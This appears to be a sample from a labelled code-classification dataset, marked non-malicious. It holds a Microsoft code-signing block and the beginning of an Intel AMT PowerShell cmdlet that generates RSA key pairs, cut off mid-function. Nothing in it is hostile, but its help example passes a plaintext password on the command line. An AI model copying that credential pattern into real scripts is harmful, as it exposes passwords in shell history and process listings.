# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCQ4iYWtTC8vYI6
# 4IUjKvT76wwP+2aMIIDncOlhPeOB16CCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEILuk/gEHB1yDKOdrFrRmvX5F
# fBrDYTjWE4Gjsamrh9ZnMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAQ0fHpasLsGVND3AkNR2onlpJb/doQ6qgmiMwNIsYa440H9/L+LxoTRkk
# ku+O59cqV/2QNixnExcfv/OrdtFj+W+kS/LVGbnUZYa47bWxGxaDOJ5UHEbzEzSq
# MbrXx3vRCZt0ENQpCLP0BVYmQfz8VU3v4A1E5xS9wv5vyMJgCHzrVyn3RJnl89Sk
# iwf2HUXPoYcHHaxCNYxgFa0FsfYUsiC6vyLP56J8noC3TloA8w0+tzlFymUybxuV
# GTnHj2VlK5lmtoiMHkyviuTAPqO61eStwwwPeTHSKRACrF9fniu8Cgzr/3ad82yj
# 7f6YWcJleNj3HSj+HyT2ecj0CavuK6GCFykwghclBgorBgEEAYI3AwMBMYIXFTCC
# FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq
# hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCCavJDKct7OE4r7PdrTWEqBL4edPqc0v1r3/JtXB1mGsQIGZiAsyEE0
# GBMyMDI0MDQyMzEzMTUyMy45NzFaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO
# OkQwODItNEJGRC1FRUJBMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT
# ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHcweCMwl9YXo4AAQAAAdwwDQYJ
# KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx
# MDEyMTkwNzA2WhcNMjUwMTEwMTkwNzA2WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl
# cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpEMDgyLTRC
# RkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC
# AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIvIsyA1sjg9kSKJzelrUWF5
# ShqYWL83amn3SE5JyIVPUC7F6qTcLphhHZ9idf21f0RaGrU8EHydF8NxPMR2KVNi
# AtCGPJa8kV1CGvn3beGB2m2ltmqJanG71mAywrkKATYniwKLPQLJ00EkXw5TSwfm
# JXbdgQLFlHyfA5Kg+pUsJXzqumkIvEr0DXPvptAGqkdFLKwo4BTlEgnvzeTfXukz
# X8vQtTALfVJuTUgRU7zoP/RFWt3WagahZ6UloI0FC8XlBQDVDX5JeMEsx7jgJDdE
# nK44Y8gHuEWRDq+SG9Xo0GIOjiuTWD5uv3vlEmIAyR/7rSFvcLnwAqMdqcy/iqQP
# MlDOcd0AbniP8ia1BQEUnfZT3UxyK9rLB/SRiKPyHDlg8oWwXyiv3+bGB6dmdM61
# ur6nUtfDf51lPcKhK4Vo83pOE1/niWlVnEHQV9NJ5/DbUSqW2RqTUa2O2KuvsyRG
# MEgjGJA12/SqrRqlvE2fiN5ZmZVtqSPWaIasx7a0GB+fdTw+geRn6Mo2S6+/bZEw
# S/0IJ5gcKGinNbfyQ1xrvWXPtXzKOfjkh75iRuXourGVPRqkmz5UYz+R5ybMJWj+
# mfcGqz2hXV8iZnCZDBrrnZivnErCMh5Flfg8496pT0phjUTH2GChHIvE4SDSk2hw
# WP/uHB9gEs8p/9Pe/mt9AgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU6HPSBd0OfEX3
# uNWsdkSraUGe3dswHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD
# VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
# cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG
# CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw
# MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD
# CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBANnrb8Ewr8eX/H1s
# Kt3rnwTDx4AqgHbkMNQo+kUGwCINXS3y1GUcdqsK/R1g6Tf7tNx1q0NpKk1JTupU
# JfHdExKtkuhHA+82lT7yISp/Y74dqJ03RCT4Q+8ooQXTMzxiewfErVLt8Wefebnc
# ST0i6ypKv87pCYkxM24bbqbM/V+M5VBppCUs7R+cETiz/zEA1AbZL/viXtHmryA0
# CGd+Pt9c+adsYfm7qe5UMnS0f/YJmEEMkEqGXCzyLK+dh+UsFi0d4lkdcE+Zq5JN
# jIHesX1wztGVAtvX0DYDZdN2WZ1kk+hOMblUV/L8n1YWzhP/5XQnYl03AfXErn+1
# Eatylifzd3ChJ1xuGG76YbWgiRXnDvCiwDqvUJevVRY1qy4y4vlVKaShtbdfgPyG
# eeJ/YcSBONOc0DNTWbjMbL50qeIEC0lHSpL2rRYNVu3hsHzG8n5u5CQajPwx9Pzp
# sZIeFTNHyVF6kujI4Vo9NvO/zF8Ot44IMj4M7UX9Za4QwGf5B71x57OjaX53gxT4
# vzoHvEBXF9qCmHRgXBLbRomJfDn60alzv7dpCVQIuQ062nyIZKnsXxzuKFb0TjXW
# w6OFpG1bsjXpOo5DMHkysribxHor4Yz5dZjVyHANyKo0bSrAlVeihcaG5F74SZT8
# FtyHAW6IgLc5w/3D+R1obDhKZ21WMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ
# mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh
# dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1
# WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB
# BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK
# NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg
# fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp
# rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d
# vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9
# 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR
# Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu
# qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO
# ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb
# oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6
# bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t
# AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW
# BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb
# UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz
# aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku
# aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA
# QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2
# VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu
# bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw
# LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93
# d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt
# MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q
# XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6
# U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt
# I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis
# 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp
# kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0
# sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e
# W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ
# sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7
# Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0
# dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ
# tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh
# bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpE
# MDgyLTRCRkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy
# dmljZaIjCgEBMAcGBSsOAwIaAxUAHDn/cz+3yRkIUCJfSbL3djnQEqaggYMwgYCk
# fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF
# AOnRQkowIhgPMjAyNDA0MjMwNDA4NDJaGA8yMDI0MDQyNDA0MDg0MlowdDA6Bgor
# BgEEAYRZCgQBMSwwKjAKAgUA6dFCSgIBADAHAgEAAgIUTDAHAgEAAgISBDAKAgUA
# 6dKTygIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID
# B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAKdfQ6krn/9XKU8Iy031
# XFlG85OEXSoh4dBGaqeGlD943dkMdlPnjE+MNokMWYaQ0JNKwtpMkAnPoDcyylCP
# CELlR54i9KaOR7WJp72VKtL04H/EbopdGU86A523FLhAdtVx7+UUaWwr/s7KcbHa
# SrCmgPUrOzaTxyDnHHkwJ3OWMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt
# U3RhbXAgUENBIDIwMTACEzMAAAHcweCMwl9YXo4AAQAAAdwwDQYJYIZIAWUDBAIB
# BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx
# IgQgcZ8qrCnZV76nQXOMpDXzGI3NJ/6rbgrbMrETchssVsYwgfoGCyqGSIb3DQEJ
# EAIvMYHqMIHnMIHkMIG9BCBTpxeKatlEP4y8qZzjuWL0Ou0IqxELDhX2TLylxIIN
# NzCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB3MHg
# jMJfWF6OAAEAAAHcMCIEIMlj5Czdui1+yXOeEgNyO7aqtd0QRMsB+0i74NsgRz7z
# MA0GCSqGSIb3DQEBCwUABIICABnyzVO3HWyxBjsW4utq/C+f9v7HQBy0RILSiiu9
# aYbLYhanBhWf7dQ3A7EfLjxhkFHLqEzncOE9wAZJvbtvG+tpQGAfTyew/cY9ckdp
# WLq7+mx/woS3MGLv47QGoTDOUklzeGUXB/Y8dJ6TZ0UQ9qQ/CUdQdMNejrE+1k4U
# rBKaz3PHlQniYOPnrOmUxIBX27a9s20Fy0Ubjk4H26flzRJ3BrhSdZU1ACkX1vKX
# xPipJYzZuWCe5xCFShERphlTcH3bfDI6j/z72e2/90lLiLtxHuhZkzqcWXHj6N+8
# oI2kAREgoswouQHfSPDfGY/eLnb+XoP9SHjJPP7DbohF+UCZu52Jc0FMCsOiNyUX
# //f/TETQP4sBE/zj4wLEzHs0tiw8IUUfaXTC0FcvF6BMnyKMWUvhMxQGDDLAhz1c
# utKoQ+yYnoOK3B+4xgX97nErdTTdXKz3QOXR6/hVGYWwUlLrltuGyZNyMm0Q4eey
# xEBKtVQQnBfM8TZ4xwizuVfsTZTtaJn4Kxcj5BzRO5AJWx9kGx30DgeZMZ+P1lDY
# FpweeRpIvmh5jaWYSXhzaf232qcsn27Vn4fNbawB8h3Q61DMpzvHQRVpHhfDG5or
# MvMa9HzqD2VD8nYOKNBqy+DcQKCzacGYIZZ0+ybHXH5h0cS4j+nKmyGtFCPxY/kK
# 8hC2
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_48_96.ps1
|
sample_48_96.ps1
|
# Copyright (C) Intel Corporation, 2021 All Rights Reserved.
function Invoke-GenerateKeyPair {
<#
.Synopsis
Generate Key Pair.
.Description
This cmdlet generates a KeyPair object and adds the new key to AMT.
.Notes
AMT Provisioning:
The vPro client AMT firmware must be provisioned prior to accessing AMT functionality. This CMDLet will fail if it is run against a vPro client that has not been provisioned.
AMT Client Authentication:
To invoke commands against AMT enabled clients credentials to authenticate must be specified.
When no credential is provided as a parameter, the script will use the local logged on Kerberos credential.
When only the username (Kerberos or Digest) parameter is included the user will be prompted to provide the associated password.
Credentials should be stored as a PowerShell variable then passed into the Cmdlet with the credential parameter.
$AMTCredential = get-credential
AMT Client Encryption:
If the Intel vPro client has been configured to use TLS (a web server certificate has been issued to the Intel Management Engine) the Cmdlet must be called with a -TLS switch.
When managing an Intel vPro client over TLS (Port 16993) it is important that the computername parameter matchs the primary subject name of the issued TLS certificate. Typically this is the fully qualified domain name (FQDN).
If Mutual TLS is desired, the Cmdlet must be called with -TLS switch and with a valid certificate name from the certificate store in the -CertificateName parameter.
Status:
Status output designates if the Cmdlet was run successfully. For failed attempts additional status may be provided.
.Link
http:\\vproexpert.com
http:\\www.intel.com\vpro
http:\\www.intel.com
.Example
Invoke-GenerateKeyPair -ComputerName 192.168.168.10 -Username admin -Password Admin!98 -KeyAlgorithm RSA -KeyLength 2048
Key Pair Generated Successfully!
#>
[CmdletBinding()]
Param (
[Parameter(Mandatory = $true, position = 0,HelpMessage = "Hostname, FQDN, or IP Address")] [String[]] $ComputerName,
[Parameter(Mandatory = $false, position = 1,HelpMessage = "Digest User")] [string] $Username,
[Parameter(Mandatory = $false, position = 2,HelpMessage = "Digest Password")] [string] $Password,
[Parameter(Mandatory=$false,ValueFromPipelineByPropertyName=$true, ValueFromPipeline=$false, position=3, HelpMessage="Valid Ports are 16992 (non-TLS) or 16993 (TLS)")][ValidateSet("16992", "16993")] [String] $Port,
[Parameter(Mandatory=$false,ValueFromPipelineByPropertyName=$true,ValueFromPipeline=$false, position=4, HelpMessage="Use TLS (Port 16993)")] [switch] $TLS,
[Parameter(Mandatory=$false,ValueFromPipelineByPropertyName=$true,ValueFromPipeline=$false, position=5, HelpMessage="Name of certificate. (Use for mutual TLS)")] [string] $CertificateName,
[Parameter(Mandatory = $true, position = 6,HelpMessage = "Valid Key Algorithm is RSA")][ValidateSet("RSA")] [string] $KeyAlgorithm,
[Parameter(Mandatory = $true, position = 7,HelpMessage = "Key Length")] [string] $keyLength
)
PROCESS
{
$Results = @()
$Results += "`n"
try
{
# Create a connection object
$wsmanConnectionObject = New-Object Intel.Management.Wsman.WsmanConnection
if ($Credential.username.Length -gt 0) {
$wsmanConnectionObject.SetCredentials($Credential.Username, $Credential.Password)
} elseif ($Username.length -gt 0) {
if ($Password.length -gt 0) {
$wsmanConnectionObject.SetCredentials($Username, $Password)
} else {
$Cred = Get-Credential $Username
$wsmanConnectionObject.SetCredentials($Cred.Username, $Cred.Password)
}
}
if ($Port -ne "16993") {
